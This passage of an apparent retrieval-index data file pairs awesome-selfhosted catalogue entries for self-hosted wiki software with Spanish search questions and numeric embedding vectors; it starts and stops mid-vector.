-0.06416, -0.01394, -0.03271, 0.00479, -0.02717, 0.01846, -0.01001, 0.04135, 0.06033, 0.00265, 0.02278, -0.02967, 0.0643, 0.05779, 0.01155, -0.04517, -0.00605, -0.04879, 0.02995, -0.02428, 0.0027, -0.00074, -0.01914, -0.03296, -0.05535, -0.02686, 0.0484, 0.0769, -0.03651, -0.06295, 0.00574, -0.07521, -0.07943, 0.00404, 0.03013, -0.11032, -0.04398, 0.00026, 0.00971, -0.06599, 0.00599, -0.05507]} +{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: AmuseWiki β€” Amusewiki is based on the Emacs Muse markup, remaining mostly compatible with the original implementation. It can work as a read-only site, as a moderated wiki, or as a fully open wiki or even as a private site [GPL-1.0, Perl/Docker]. BookStack β€” Organize and store information. Stores documentation in a book like fashion [MIT, PHP/Docker]. django-wiki β€” Wiki system with complex functionality for simple integration and a superb interface. Store your knowledge with style: Use django models [GPL-3.0, Python]. docmost Community Edition β€” Collaborative wiki and documentation software (alternative to Confluence, Notion) [AGPL-3.0, Docker/Nodejs]. Documize β€” Modern Docs + Wiki software with built-in workflow, single binary executable, just bring MySQL/Percona [AGPL-3.0, Go]. Dokuwiki β€” Easy to use, lightweight, standards-compliant wiki engine with a simple syntax allowing reading the data outside the wiki. All data is stored in plain text files, therefore no database is required [GPL-2.0, PHP].", "indexar": "cual es una alternativa libre a Notion o Confluence para gestionar wikis desde el navegador?", "v": [-0.15073, -0.00379, -0.04295, -0.0834, -0.02269, -0.02193, -0.09069, -0.09456, -0.03805, -0.10846, -0.00592, -0.26182, -0.10016, 0.04538, 0.01147, 0.04374, 0.14928, -0.1583, 0.07932, 0.04751, -0.19134, -0.03216, 0.00759, -0.02876, -0.00752, -0.10363, -0.02555, -0.07076, 0.0381, -0.04327, -0.13148, -0.07396, 0.01922, -0.02157, 0.01362, 0.13192, 0.07968, 0.11768, 0.15655, -0.09935, -0.1097, -0.04028, -0.11423, 0.06848, -0.07198, -0.08812, -0.05256, -0.09466, 0.08757, -0.0325, -0.03365, -0.12025, -0.11736, 0.06141, -0.07586, -0.02339, 0.16039, -0.12777, -0.03353, -0.00476, -0.02571, 0.08398, -0.01256, -0.03461, 0.04901, -0.06468, -0.03221, 0.03286, 0.00164, 0.15598, 0.04548, -0.05983, 0.01764, 0.02373, 0.02706, 0.00108, 0.00116, 0.08593, 0.01037, 0.0229, 0.05237, 0.00395, -0.01568, -0.02883, 0.03037, -0.09486, 0.01741, -0.10154, 0.06116, 0.11801, 0.02961, -0.05988, -0.00435, -0.06519, -0.03278, -0.10332, 0.04814, 0.05719, 0.01704, -0.00204, -0.0199, 0.01656, -0.09204, 0.00918, -0.01325, 0.0227, 0.00162, -0.04198, -0.0916, 0.04813, 0.048, 0.04198, -0.03318, 0.02936, 0.05436, 0.0819, 0.02966, 0.02792, 0.00439, -0.08552, -0.06163, -0.08379, -0.09263, -0.0779, 0.05727, 0.14479, 0.02477, 0.03935, -0.00977, -0.04522, 0.04724, -0.12678, -0.02189, 0.01085, -0.08783, -0.01382, -0.01637, -0.03409, 0.00607, -0.01919, -0.06164, -0.02646, 0.03749, 0.0475, 0.06514, -0.14791, 0.0121, -0.01833, -0.01903, -0.05389, -0.01396, -0.07504, 0.01194, 0.08582, -0.05823, 0.10229, -0.07902, 0.02685, -0.05928, 0.04374, -0.0189, -0.08931, 0.05964, 0.02915, 0.01703, -0.02699, -0.05098, -0.01087, -0.03552, 0.01318, 0.00415, 0.05968, 0.01267, -0.05621, 0.02205, -0.06619, 0.03274, -0.05158, 0.06299, -0.02026, 0.06775, -0.04256, -0.0691, 0.0238, -0.04439, -0.08103, -0.03309, 0.08987, -0.0358, 0.04887, -0.07383, 0.00697, -0.06516, -0.0467, 0.08955, 0.01106, 0.01105, -0.09881, -0.04363, 0.01782, -0.06657, -0.06387, 0.00531, -0.03352, -0.03658, 0.00074, 0.00599, 0.0075, 0.09788, 0.05004, 0.00614, -0.01565, 0.03609, 0.01454, -0.05188, -0.04705, 0.02899, 0.01171, 5e-05, -0.02997, 0.036, -0.00632, -0.01249, -0.01931, 0.05463, 0.02131, 0.0359, 0.02032, -0.0626, 0.00484, 0.02314, -0.02515, 0.00033, 0.02339, -0.0107, -0.01222, 0.02023, -0.00921, -0.00558, 0.05183, -0.01435, 0.01071, 0.02381, -0.02931, -0.01913, 0.03464, -0.06805, -0.04616, -0.01244, -0.02201, -0.03336, -0.0022, -0.00735, 0.02405, 0.01592, 0.01358]} +{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: Feather Wiki β€” A lightning fast and infinitely extensible tool for creating personal non-linear notebooks, databases, and wikis that is entirely self-contained, runs in your browser, and is only 58 kilobytes in size [AGPL-3.0, Javascript]. Gitit β€” Wiki program that stores pages and uploaded files in a git repository, which can then be modified using the VCS command line tools or the wiki's web interface [GPL-2.0, Haskell]. Gollum β€” Simple, Git-powered wiki with a sweet API and local frontend [MIT, Ruby]. LeafWiki β€” A fast wiki for people who think in folders, not feeds. Fast editing. Tree navigation. Markdown on disk [MIT, Docker/Go]. Mediawiki β€” Wiki software package that powers Wikipedia and all other Wikimedia projects, serving hundreds of millions of users each month [GPL-2.0, PHP]. Mycorrhiza Wiki β€” Filesystem and git-based wiki engine written in Go using Mycomarkup as its primary markup language [AGPL-3.0, Go]. Otter Wiki β€” Simple, easy to use wiki software using markdown [MIT, Docker].", "indexar": "que programa hay para montar un wiki en la nube que funcione rΓ‘pido y no requiera servidor?", "v": [-0.04499, -0.00491, -0.2712, -0.13334, -0.03535, -0.11986, -0.07489, -0.08881, -0.09346, -0.20118, -0.05331, -0.11544, 0.04935, -0.04095, -0.06056, -0.01063, 0.08769, -0.14286, 0.09872, 0.06298, -0.04494, 0.02122, 2e-05, -0.03981, -0.11704, -0.00963, 0.07544, -0.0187, -0.12568, -0.04093, 0.01243, 0.0409, 0.08208, -0.0294, 0.04952, -0.06843, 0.0323, -0.00063, -0.00972, 0.01359, 0.0023, -0.04635, -0.10051, 0.05309, -0.01676, 0.01052, 0.12773, -0.15089, 0.10208, 0.01111, 0.02095, -0.03198, -0.03562, 0.03819, -0.13352, -0.04475, 0.08274, -0.11243, 0.05754, 0.00109, -0.10624, 0.03565, -0.05919, -0.17198, 0.06326, -0.03509, 0.01342, -0.02207, -0.12141, 0.0205, -0.09264, -0.04327, 6e-05, -0.03555, 0.05171, 0.06731, 0.00389, -0.06403, -0.0365, 0.07469, -0.03906, 0.13778, -0.00231, 0.12233, -0.13648, -0.03753, 0.06093, -0.05597, 0.07064, 0.08108, 0.01888, 0.0617, 0.02002, 0.10649, 0.09737, -0.06993, 0.12686, 0.10192, 0.06112, 0.04999, 0.04673, 0.01087, -0.04433, 0.07419, -0.05989, 0.07356, 0.16027, -0.0349, 0.02729, 0.07357, 0.0684, -0.01425, -0.02601, 0.00888, -0.08346, -0.07674, 0.01223, 0.01464, -0.06153, 0.02895, -0.11513, 0.05156, 0.02447, 0.05287, 0.05738, -0.05321, 0.06811, 0.0494, -0.05626, -0.0247, -0.05726, -0.03776, -0.01433, 0.00967, -0.05808, 0.02739, -0.04169, -0.05732, -0.04021, -0.01125, 0.02343, -0.02047, 0.01471, 0.06064, 0.07107, -0.0452, 0.11764, -0.0431, -0.03388, 0.06588, 0.03315, -0.00546, -0.08032, 0.00833, -0.16996, -0.04746, 0.02511, -0.00976, -0.06887, 0.03316, 0.05923, 0.00327, -0.00975, -0.01488, 0.0477, -0.06833, -0.0275, 0.09351, 0.04715, 0.08336, -0.06813, 0.03614, 0.00327, -0.06375, 0.05485, 0.06429, -0.01243, -0.04145, 0.07391, 0.008, -0.05491, -0.01072, 0.04441, 0.05217, -0.07185, -0.02218, -0.05333, 0.03555, -0.05158, 0.07485, 0.01815, -0.06009, -0.06889, 0.02807, 0.0541, -0.04163, -0.05674, -0.04154, -0.0061, -0.06242, -0.04393, -0.01942, -0.03995, -0.02675, 0.02185, 0.00369, 0.02512, 0.04994, 0.08802, 0.05099, -0.00719, -0.02943, 0.01317, -0.02132, 0.03348, -0.00157, 0.03546, -0.01542, -0.00933, -0.00629, -0.00584, -0.02116, 0.03366, 0.04129, 0.00534, -0.00105, -0.01143, 0.03209, 0.04129, -0.03742, 0.00283, -0.02138, 0.00907, -0.06293, 0.0137, 0.00827, 0.00924, 0.00071, -0.02319, -0.05108, -0.0142, 0.04738, 0.01157, -0.0476, -0.03577, -0.00935, -0.02055, -0.02265, -0.00389, 0.00081, -0.02242, -0.00109, -0.00278, -0.04741, -0.01699, -0.01248]} +{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: Feather Wiki β€” A lightning fast and infinitely extensible tool for creating personal non-linear notebooks, databases, and wikis that is entirely self-contained, runs in your browser, and is only 58 kilobytes in size [AGPL-3.0, Javascript]. Gitit β€” Wiki program that stores pages and uploaded files in a git repository, which can then be modified using the VCS command line tools or the wiki's web interface [GPL-2.0, Haskell]. Gollum β€” Simple, Git-powered wiki with a sweet API and local frontend [MIT, Ruby]. LeafWiki β€” A fast wiki for people who think in folders, not feeds. Fast editing. Tree navigation. Markdown on disk [MIT, Docker/Go]. Mediawiki β€” Wiki software package that powers Wikipedia and all other Wikimedia projects, serving hundreds of millions of users each month [GPL-2.0, PHP]. Mycorrhiza Wiki β€” Filesystem and git-based wiki engine written in Go using Mycomarkup as its primary markup language [AGPL-3.0, Go]. Otter Wiki β€” Simple, easy to use wiki software using markdown [MIT, Docker].", "indexar": "con quΓ© puedo crear una base de datos personal que guarde mis archivos directamente en git?", "v": [-0.16948, 0.03235, -0.04193, -0.10981, 0.01961, -0.14756, -0.0555, 0.08246, -0.1082, -0.07553, -0.03665, -0.12768, -0.05703, 0.04803, 0.08445, -0.07006, 0.11346, -0.02616, 0.01991, -0.01356, -0.06307, 0.0127, 0.16273, -0.19385, -0.11184, -0.0372, 0.17742, 0.09301, -0.13067, 0.17964, -0.05784, -0.01165, -0.09155, 0.01034, -0.07233, 0.03339, 0.04339, 0.09444, -0.09708, 0.04055, -0.08449, -0.02708, -0.07551, 0.20377, 0.04669, -0.08525, 0.06947, -0.00026, 0.08445, -0.03407, -0.09339, -0.00574, -0.07798, -0.02563, -0.03401, -0.02963, 0.02029, -0.14473, 0.07123, 0.08612, -0.16371, 0.08104, 0.06696, 0.00365, -0.02016, 0.01153, 0.0403, -0.0347, -0.12024, 0.08793, -0.02984, 0.01317, -0.0441, 0.01234, 0.01826, -0.0398, 0.03769, 0.00626, -0.10963, 0.05098, -0.08807, 0.03681, -0.02896, 0.00033, -0.0649, -0.00077, 0.0153, 0.02976, -0.01775, -0.02583, 0.10122, 0.03868, -0.12179, 0.00069, 0.00454, 0.00909, 0.02796, -0.08538, -0.09174, -0.08924, -0.06876, -0.03175, 0.02452, 0.14582, 0.11052, 0.02784, 0.09736, 0.06279, -0.05038, -0.05889, 0.04768, 0.00598, -0.01026, 0.07518, 0.00087, -0.04136, -0.05522, -0.01888, 0.01575, 0.00765, 0.02681, -0.05025, -0.01878, -0.05609, -0.00284, 0.00971, 0.00586, 0.07201, -0.10858, 0.08557, -0.04161, -0.01646, -0.06183, -0.00096, 0.00424, 0.07425, -0.04125, -0.04901, 0.03967, -0.03073, 0.05179, 0.00016, -0.02318, 0.06586, 0.06645, -0.01606, -0.03104, 0.0158, -0.06894, -0.0722, -0.01728, 0.0104, 0.01837, 0.01445, -0.13186, 0.04401, 0.00846, -0.08072, -0.01779, 0.02451, -0.00204, 0.07958, -0.14477, 0.06937, -0.00786, -0.08859, 0.07542, 0.06188, -0.01176, 0.04586, -0.03202, 0.06255, 0.01573, -0.1146, 0.04681, 0.01892, -0.05645, -0.08576, 0.00433, -0.02941, 0.04385, -0.05474, -0.00835, 0.01383, 0.04938, -0.05517, 0.07509, 0.00367, -0.00553, 0.08374, -0.08218, 0.07027, 0.03602, -0.01524, -0.01814, -0.04408, 0.00873, 0.00622, 0.01064, -0.00185, 0.01345, 0.02028, -0.00155, 0.06786, 0.00042, -0.03092, -0.06702, -0.02943, 0.02481, -0.08607, 0.00111, 0.03239, 0.0632, -0.01081, 0.01487, 0.01344, 0.03245, -0.01116, 0.0516, -0.05381, -0.02771, 0.04966, 0.06172, -0.02029, -0.0211, 0.02743, -0.02424, -0.04278, -0.00419, -0.00046, -0.00256, -0.02742, 0.00156, -0.0221, 0.02254, 0.00989, -0.0489, 0.02125, -0.00686, -0.02274, 0.01287, 0.06809, -0.02383, -0.05821, -0.00214, -0.0309, -0.03302, 0.02903, -0.01149, -0.0654, -0.03194, -0.03314, -0.00553, -0.00891, -0.03646, 0.0016]} +{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: Feather Wiki β€” A lightning fast and infinitely extensible tool for creating personal non-linear notebooks, databases, and wikis that is entirely self-contained, runs in your browser, and is only 58 kilobytes in size [AGPL-3.0, Javascript]. Gitit β€” Wiki program that stores pages and uploaded files in a git repository, which can then be modified using the VCS command line tools or the wiki's web interface [GPL-2.0, Haskell]. Gollum β€” Simple, Git-powered wiki with a sweet API and local frontend [MIT, Ruby]. LeafWiki β€” A fast wiki for people who think in folders, not feeds. Fast editing. Tree navigation. Markdown on disk [MIT, Docker/Go]. Mediawiki β€” Wiki software package that powers Wikipedia and all other Wikimedia projects, serving hundreds of millions of users each month [GPL-2.0, PHP]. Mycorrhiza Wiki β€” Filesystem and git-based wiki engine written in Go using Mycomarkup as its primary markup language [AGPL-3.0, Go]. Otter Wiki β€” Simple, easy to use wiki software using markdown [MIT, Docker].", "indexar": "cual es una alternativa libre a mediawiki para gestionar mi propia enciclopedia?", "v": [0.07078, 0.04783, 0.04741, 0.02736, -0.03104, 0.00936, -0.14425, -0.07268, -0.10218, -0.1651, 0.01243, -0.03232, -0.0516, -0.01698, 0.00413, 0.00275, 0.17838, -0.10746, 0.09047, -0.04499, -0.05043, 0.0293, -0.02823, -0.11658, -0.05372, -0.1535, 0.10545, -0.05189, -0.11531, -0.04347, -0.01604, 0.10107, -0.02598, -0.07989, 0.04025, 0.05567, 0.08877, 0.0543, 0.05608, -0.05838, -0.11505, -0.15888, -0.12015, 0.0667, -0.00218, 0.03848, 0.00558, -0.14204, -0.09228, 0.04163, -0.01845, -0.03589, -0.1106, 0.09531, 0.02189, -0.10896, 0.19956, -0.0922, 0.01162, 0.08691, -0.06407, 0.09558, -0.03816, 0.04659, 0.02777, -0.06738, -0.03618, 0.01486, -0.12955, 0.11204, -0.05949, -0.08243, 0.02348, 0.00429, 0.01468, 0.04615, -0.11032, 0.02693, 0.03517, -0.05294, -0.05091, -0.11116, 0.06468, -0.07369, -0.05739, -0.01894, 0.05525, -0.05235, -0.01859, -0.02458, 0.04152, -0.0563, -0.07729, -0.02858, -0.06797, -0.10579, 0.09539, 0.04273, 0.0641, 0.03281, 0.02597, -0.04946, -0.09859, -0.01749, -0.05878, -0.04443, 0.05452, -0.08513, -0.08877, -0.03567, 0.08598, 0.13079, 0.02511, -0.00569, -0.03142, 0.09193, -0.06719, 0.00416, -0.01803, 0.02694, -0.03451, -0.10674, 0.02484, -0.05793, -0.00229, 0.06381, 0.04537, 0.07104, 0.06754, 0.01453, 0.0127, -0.00861, -0.08476, -0.0652, -0.12836, -0.03511, -0.0103, -0.02965, 0.01601, -0.06292, -0.06261, 0.05358, 0.01313, -0.015, 0.08724, -0.01979, 0.04142, -0.06896, -0.01058, 0.05365, -0.03641, -0.02587, 0.02264, 0.1269, -0.06036, 0.03785, -0.0224, -0.04327, -0.02322, 0.01291, 0.07218, -0.02249, 0.00538, 0.01322, 0.01388, -0.06247, -0.05376, -0.02394, -0.06691, -0.03781, -0.0399, 0.0708, 0.07282, -0.03678, 0.05789, -0.06923, 0.00054, -0.10471, 0.07304, -0.01534, -0.02404, 0.03, -0.0407, -0.01133, -0.03979, -0.11361, 0.00454, 0.04148, -0.03495, 0.09131, -0.08155, 0.02805, -0.04128, -0.05864, 0.00973, 0.0037, -0.04468, -0.04752, -0.02737, 0.01834, 0.02149, 0.01934, 0.00068, 0.00555, -0.01205, -0.00613, 0.00631, 0.03933, 0.05099, 0.05608, 0.03981, 0.03787, 0.07619, 0.08512, -0.05827, -0.01372, 0.12156, -0.01062, -0.00464, -0.02448, 0.03892, 0.05382, 0.05388, -0.09348, -0.05175, 0.03481, 0.0498, 0.02351, -0.02287, 0.00775, -0.03756, 0.03701, 0.04262, 0.0202, 0.03047, -0.03625, 0.03441, 0.00795, 0.01629, -0.03011, 0.02429, 0.02857, -0.09645, -0.03422, 0.00784, -0.0504, -0.07391, -0.02255, -0.01186, -0.05302, -0.01023, 0.0324, 0.07064, -0.00499, 0.06237, -0.02385]} +{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: PmWiki β€” Wiki-based system for collaborative creation and maintenance of websites [GPL-3.0, PHP]. Raneto β€” Knowledgebase platform that uses static Markdown files [MIT, Nodejs]. TiddlyWiki β€” Reusable non-linear personal web notebook [BSD-3-Clause, Nodejs]. Tiki β€” Wiki CMS Groupware with the most built-in features [LGPL-2.1, PHP]. W β€” Lightweight, mutli-user, flat-file-database Wiki engine. Create pages quickly and edit them in your Web browser using Mardown/HTML/CSS/JS. The main difference with other wiki is that you are encouraged to customize each page style individually [AGPL-3.0, PHP]. WackoWiki β€” WackoWiki is a light and easy to install multilingual Wiki-engine [BSD-3-Clause, PHP]. Wiki-Go β€” A modern, feature-rich, databaseless flat-file wiki platform [GPL-3.0, Go/Docker]. Wiki.js β€” Modern, lightweight and powerful wiki app using Git and Markdown [AGPL-3.0, Nodejs/Docker/K8S]. WikiDocs β€” A databaseless markdown flat-file wiki engine [MIT, PHP/Docker]. WiKiss β€” Wiki, simple to use and install [GPL-2.0, PHP].", "indexar": "quΓ© sistema wiki me permite editar cada pΓ‘gina con un estilo diferente?", "v": [-0.09155, 0.16911, -0.0451, -0.07935, -0.02544, -0.12049, -0.14729, -0.20071, 0.00941, -0.15041, -0.07904, -0.1863, -0.07034, -0.07907, 0.07623, -0.06043, 0.14007, -0.1028, 0.1285, -0.10485, -0.04338, -0.06867, -0.10138, -0.11312, -0.06568, -0.13021, 0.08648, -0.04794, -0.09723, -0.01644, -0.09748, 0.11778, 0.02983, -0.07456, -0.12964, -0.01486, 0.15678, 0.02283, 0.02015, 0.00984, -0.03215, -0.08995, -0.02284, 0.04025, 0.08727, 0.04517, 0.02267, 0.02011, 0.02807, 0.00037, 0.03036, -0.03789, -0.10471, 0.07803, -0.06599, -0.1086, 0.15932, -0.0183, 0.01324, 0.04111, -0.00215, 0.08508, -0.1066, -0.04131, 0.03663, -0.07879, -0.06676, -0.08927, 0.00421, 0.12078, -0.02318, -0.12032, 0.08217, -0.03393, 0.06267, -0.00781, 0.09052, -0.00469, -0.00174, 0.00966, -0.10357, 0.0672, -0.10518, 0.01984, 0.01069, -0.04406, -0.00279, 0.00599, 0.06863, -0.04959, 0.08973, -0.10755, 0.04504, -0.01029, -0.07618, -0.09667, -0.04809, 0.04947, 0.00913, 0.02907, 0.02805, -0.04668, -0.03717, 0.0163, -0.05543, -0.07136, 0.01862, -0.04532, 0.04038, 0.00811, 0.04764, 0.0502, 0.02592, -0.04774, -0.02027, 0.06219, -0.00385, 0.13555, -0.09535, -0.05853, -0.06417, 0.01334, -0.02759, -0.02657, 0.11377, -0.00232, 0.01209, 0.04087, -0.00018, 0.01967, -0.02644, -0.07463, -0.01459, 0.05193, 0.03139, -0.01755, -0.02731, 0.06768, 0.02522, 0.04287, -0.06516, 0.04619, 0.0255, -0.00545, -0.00047, -0.07233, 0.08725, -0.06711, -0.17177, 0.00024, -0.05452, 0.02929, -0.01861, -0.061, -0.11724, 0.02602, 0.01914, -0.069, 0.01166, -0.02549, -0.03217, 0.02397, 0.03821, -0.07906, 0.01324, -0.06113, -0.0401, -0.00313, 0.01111, 0.00047, 0.00616, 0.05629, 0.05561, 0.019, 0.02648, -0.01236, -0.06526, -0.02423, 0.05712, 0.0407, -0.05007, 0.05984, -0.00485, -0.00975, 0.01018, -0.05341, -0.04959, 0.06904, -0.03472, 0.01526, 0.02694, 0.04603, -0.02882, 0.00931, -0.00237, 0.09958, 0.03055, -0.05581, 0.02148, -0.03228, -0.02476, -0.04038, 0.08917, -0.07747, 0.01763, 0.00084, 0.06377, -0.01381, 0.06149, 0.06159, 0.00595, -0.03622, 0.036, -0.0071, -0.02227, 0.04776, -0.00813, -0.02415, 0.00395, -0.06827, 0.04094, -0.0237, 0.02846, 0.03509, 0.01094, -0.00061, -0.00282, -0.04802, -0.07606, -0.04154, 0.04943, -0.08629, -0.00605, 0.00734, 0.01372, -0.02258, -0.03108, 0.00567, -0.05645, -0.03766, 0.00209, 0.01175, 0.00301, 0.02364, 0.03265, -0.03611, -0.05521, -0.02771, -0.05862, -0.02353, -0.0332, -0.01908, 0.00911, -0.05102, -0.054, -0.01234]} +{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: PmWiki β€” Wiki-based system for collaborative creation and maintenance of websites [GPL-3.0, PHP]. Raneto β€” Knowledgebase platform that uses static Markdown files [MIT, Nodejs]. TiddlyWiki β€” Reusable non-linear personal web notebook [BSD-3-Clause, Nodejs]. Tiki β€” Wiki CMS Groupware with the most built-in features [LGPL-2.1, PHP]. W β€” Lightweight, mutli-user, flat-file-database Wiki engine. Create pages quickly and edit them in your Web browser using Mardown/HTML/CSS/JS. The main difference with other wiki is that you are encouraged to customize each page style individually [AGPL-3.0, PHP]. WackoWiki β€” WackoWiki is a light and easy to install multilingual Wiki-engine [BSD-3-Clause, PHP]. Wiki-Go β€” A modern, feature-rich, databaseless flat-file wiki platform [GPL-3.0, Go/Docker]. Wiki.js β€” Modern, lightweight and powerful wiki app using Git and Markdown [AGPL-3.0, Nodejs/Docker/K8S]. WikiDocs β€” A databaseless markdown flat-file wiki engine [MIT, PHP/Docker]. WiKiss β€” Wiki, simple to use and install [GPL-2.0, PHP].", "indexar": "cual es una alternativa libre a Tiki para montar una wiki en un solo servidor?", "v": [-0.11987, 0.05655, -0.18782, -0.00896, -0.15207, -0.13386, -0.11633, -0.04527, 0.04428, -0.03996, -0.04026, -0.18568, 0.08688, 0.0346, 0.12009, -0.01823, 0.16358, -0.21009, 0.24589, 0.01103, -0.01291, 0.05907, -0.00626, -0.02909, 0.04764, -0.07817, 0.02079, -0.09141, -0.14077, -0.02485, 0.01917, 0.01982, 0.01722, 0.01838, -0.01155, -0.08875, 0.14477, 0.05325, 0.11304, -0.02031, -0.03483, -0.11938, -0.06239, 0.05921, -0.05399, 0.02836, 0.09458, -0.06984, 0.15158, 0.01594, 0.06342, -0.04573, -0.08303, 0.07492, -0.00837, -0.01285, 0.15111, -0.12573, 0.04829, 0.0484, -0.13324, 0.03892, -0.07187, -0.02146, 0.12256, -0.05816, -0.08471, 0.04071, -0.10919, 0.02359, -0.03382, -0.1076, 0.01475, -0.06778, -0.01643, 0.08934, 0.00918, -0.0523, -0.03009, 0.06961, 0.00438, -0.00463, -0.03466, 0.14401, -0.08706, -0.09091, 0.0404, -0.09469, 0.09838, 0.07586, 0.04969, 0.05455, -0.01675, 0.10946, 0.01531, -0.14312, 0.0947, 0.07451, -0.02534, 0.0362, 0.03087, 9e-05, -0.05545, -0.00272, 0.01426, 0.03163, 0.05156, -0.03232, -0.00507, 0.02751, 0.04599, 0.03662, -0.02783, 0.06118, -0.01854, -0.09248, 0.01731, 0.11063, 0.00081, 0.0431, -0.04378, 0.00346, 0.00778, -0.01721, 0.02985, -0.01744, 0.10035, 0.03842, -0.03153, 0.01321, 0.03552, -0.02656, -0.05942, -0.083, -0.1077, -0.01051, 0.10569, -0.03053, -0.0151, 0.01875, 0.01659, -0.02733, -0.01165, 0.00032, 0.07885, 0.01373, 0.05138, -0.08734, -0.04638, 0.01645, -0.00417, 0.00858, -0.04942, 0.04321, -0.09978, -0.00512, -0.05983, -0.02234, -0.04423, 0.06938, 0.0553, 0.00417, -0.0067, -0.00225, 0.01926, -0.02342, -0.01081, 0.05769, -0.0436, 0.00174, -0.01793, 0.07276, 0.06448, -0.01835, 0.07479, -0.03406, -0.04835, -0.06046, -0.00068, 0.00946, 0.04016, 0.007, -0.06748, 0.01024, -0.04966, -0.05357, 0.00218, 0.02215, 0.00029, 0.06483, -0.00118, -0.02981, -0.06705, -0.01248, 0.02676, -0.00132, -0.00614, -0.04685, -0.04051, -0.07548, -0.02713, -0.03576, -0.01864, -0.0327, 0.0047, -0.08172, -0.00124, 0.03895, 0.05275, 0.05494, 0.00646, 0.00331, 0.06892, -0.0125, -0.01371, 0.00149, 0.04779, -0.05299, -0.03179, -0.03871, -0.0127, 0.00102, 0.02304, 0.04081, 0.00649, 0.07174, 0.0273, -0.02301, 0.00678, -0.02512, 0.01793, 0.00474, 0.0214, 0.03105, 0.03011, 0.00792, 0.03524, 0.01383, -0.03021, -0.02243, 0.03038, 0.05208, 0.01767, -0.03111, -0.0068, -0.02905, -0.03352, -0.0164, -0.05957, -0.03646, -0.02003, -0.02084, -0.00282, -0.0193, -0.01823, -0.02951]} +{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: PmWiki β€” Wiki-based system for collaborative creation and maintenance of websites [GPL-3.0, PHP]. Raneto β€” Knowledgebase platform that uses static Markdown files [MIT, Nodejs]. TiddlyWiki β€” Reusable non-linear personal web notebook [BSD-3-Clause, Nodejs]. Tiki β€” Wiki CMS Groupware with the most built-in features [LGPL-2.1, PHP]. W β€” Lightweight, mutli-user, flat-file-database Wiki engine. Create pages quickly and edit them in your Web browser using Mardown/HTML/CSS/JS. The main difference with other wiki is that you are encouraged to customize each page style individually [AGPL-3.0, PHP]. WackoWiki β€” WackoWiki is a light and easy to install multilingual Wiki-engine [BSD-3-Clause, PHP]. Wiki-Go β€” A modern, feature-rich, databaseless flat-file wiki platform [GPL-3.0, Go/Docker]. Wiki.js β€” Modern, lightweight and powerful wiki app using Git and Markdown [AGPL-3.0, Nodejs/Docker/K8S]. WikiDocs β€” A databaseless markdown flat-file wiki engine [MIT, PHP/Docker]. WiKiss β€” Wiki, simple to use and install [GPL-2.0, PHP].", "indexar": "con quΓ© puedo crear una base de conocimiento usando archivos Markdown estΓ‘ticos?", "v": [-0.20347, 0.08871, -0.06132, -0.12132, -0.02162, -0.05952, -0.1072, 0.05311, -0.12537, -0.09697, -0.08699, -0.14618, -0.03839, 0.04237, -0.06169, 0.07525, 0.19678, -0.02009, -0.02976, 0.02702, 0.04668, -0.10998, -0.06446, -0.02231, -0.01872, -0.06599, -0.06636, 0.03146, -0.09102, 0.09441, -0.06833, 0.12871, -0.00332, -0.00804, 0.01845, -0.04631, 0.06969, 0.01665, -0.05937, 0.06263, -0.17727, 0.03554, -0.0679, 0.05887, -0.043, 0.05898, 0.02271, -0.07716, -0.01577, 0.06533, -0.05277, -0.05373, -0.17636, 0.00088, -0.04924, -0.04602, 0.05986, -0.05413, 0.07736, 0.09058, -0.12674, 0.03232, -0.0439, -0.05383, 0.08286, -0.0477, 0.03271, 0.03248, -0.0337, 0.14243, 0.06138, -0.00898, 0.03582, -0.07802, 0.05123, 0.10301, 0.05252, -0.01273, -0.02108, -0.07054, -0.05963, 0.04352, -0.08357, -0.05916, -0.08346, -0.04053, -0.00378, -0.01895, -0.07621, -0.11057, 0.0342, 0.04879, -0.10115, 0.06138, -0.04161, -0.00418, 0.04767, -0.07994, -0.10409, 0.03182, -0.06851, -0.08752, 0.02578, 0.10074, 0.0465, 0.0454, 0.14364, -0.0864, 0.0268, 0.02252, 0.04156, 0.0491, -0.02438, 0.02951, -0.11971, 0.04988, 0.02919, 0.01234, -0.01749, 0.0296, -0.03949, 0.03483, -0.03177, -0.01823, 0.05689, -0.04195, 0.04623, 0.1064, -0.01409, 0.04656, 0.08781, 0.05353, -0.11302, -0.03844, -0.00885, 0.08842, 0.0931, 0.06127, -0.102, -0.13165, 0.07643, 0.04225, -0.03582, 0.07104, 0.04533, 0.04977, 0.0063, -0.09785, -0.05048, -0.02138, -0.05313, -0.01529, -0.00606, -0.02569, -0.03475, 0.01358, -0.00932, -0.09499, 0.03858, 0.01395, -0.12422, 0.0829, -0.12166, -0.00084, -0.01359, -0.10022, 0.00994, 0.05203, 0.00552, 0.0681, 0.00739, 0.05229, -0.03317, -0.08477, 0.08661, 0.04261, -0.06556, -0.06851, -0.0474, 0.00028, 0.01612, -0.05324, 